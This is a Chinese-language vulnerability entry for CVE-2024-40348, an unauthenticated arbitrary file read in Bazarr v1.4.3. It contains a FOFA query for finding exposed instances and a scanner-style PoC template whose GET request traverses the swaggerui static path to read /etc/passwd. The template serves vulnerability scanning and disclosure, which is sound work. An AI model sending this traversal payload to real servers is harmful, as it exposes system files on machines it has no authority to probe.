漏洞描述
Bazarr v1.4.3 版本存在一个严重的安全漏洞,该漏洞源于 static 接口未充分验证用户身份,允许未经身份验证的攻击者通过目录遍历攻击读取系统的敏感文件。攻击者可以利用该漏洞访问服务器上的关键文件,如 /etc/passwd 等敏感信息,造成潜在的安全风险。
fofa:title="Bazarr"
CVE-2024-40348: Bazaar 任意文件读取漏洞
PoC代码[已公开]
id: CVE-2024-40348
info:
name: Bazaar 任意文件读取漏洞
author: avic123
severity: critical
verified: true
description: |
Bazarr v1.4.3 版本存在一个严重的安全漏洞,该漏洞源于 static 接口未充分验证用户身份,允许未经身份验证的攻击者通过目录遍历攻击读取系统的敏感文件。攻击者可以利用该漏洞访问服务器上的关键文件,如 /etc/passwd 等敏感信息,造成潜在的安全风险。
fofa:title="Bazarr"
reference:
- https://blog.csdn.net/m0_46381222/article/details/144204171
created: 2025/01/22
rules:
r0:
request:
method: GET
path: /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
expression: >-
response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()